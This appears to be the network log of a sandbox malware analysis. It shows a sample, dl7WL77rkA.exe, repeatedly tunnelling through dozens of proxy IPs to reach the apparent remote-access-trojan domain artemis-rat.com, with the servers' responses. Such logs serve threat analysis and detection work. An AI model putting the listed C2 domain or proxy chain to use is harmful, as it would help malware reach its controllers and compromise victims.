                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.055418968 CET223INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:11 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                                                            X-Kong-Response-Latency: 0.00011444091796875
                                                                                                                                                                                                                                                            Server: kong/2.8.1
                                                                                                                                                                                                                                                            Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                                                                                                                                                                                                                                                            Data Ascii: Bad request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1219192.168.2.55332343.131.245.216156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.733491898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1220192.168.2.55151151.38.63.124109833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.734282970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796385050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902416945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905234098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1221192.168.2.5533221.15.62.1256783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.734307051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1222192.168.2.553242102.132.50.680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.743150949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1223192.168.2.55148345.11.95.16660043876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.743849039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1224192.168.2.55333060.205.132.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.745220900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.064095020 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.064251900 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1225192.168.2.553311103.76.148.9281813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.751832962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.607589006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.811343908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083539009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.481995106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.108920097 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1226192.168.2.551571103.141.109.14780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.756243944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.435087919 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1227192.168.2.55328445.117.179.179187013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.756655931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1228192.168.2.55334883.243.92.15480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.790815115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1229192.168.2.553339103.216.49.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.790815115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1230192.168.2.553294103.83.36.156783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.798341036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1231192.168.2.55335545.233.2.141533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.799374104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1232192.168.2.552668103.234.24.4056783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.799434900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1233192.168.2.552620199.58.185.941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.799709082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1234192.168.2.55335747.74.226.850013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.800873995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1235192.168.2.55166051.75.126.150218033876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.816921949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889527082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1236192.168.2.551802162.240.208.98437043876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.821397066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.905116081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.014455080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.014434099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1237192.168.2.55336340.76.160.14390023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.824562073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1238192.168.2.553383104.27.15.161803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.839365005 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.993866920 CET  316  IN  HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1239192.168.2.553321102.132.48.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.851943970 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1240192.168.2.55338123.94.123.24388883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.863640070 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.306781054 CET  84  IN  HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:46 GMT
Transfer-Encoding: chunked


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1241192.168.2.55335927.65.240.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.869158983 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1242192.168.2.553360178.54.21.20380813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.871706009 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.701857090 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1243192.168.2.55239172.49.49.11310343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.874386072 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1244192.168.2.552303107.181.168.14541453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.876450062 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1245192.168.2.55336245.11.95.16550383876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.899164915 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1246192.168.2.55340912.186.205.123803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.910800934 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.101475000 CET  325  IN  HTTP/1.1 400 Bad Request
Server: nginx/1.14.1
Date: Mon, 11 Mar 2024 02:30:43 GMT
Content-Type: text/html
Content-Length: 173
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1247192.168.2.551792162.214.121.173335723876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.917449951 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.998730898 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.999154091 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.998853922 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1248192.168.2.55340823.95.209.142156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.917669058 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1249192.168.2.55274792.204.136.149169283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.931924105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
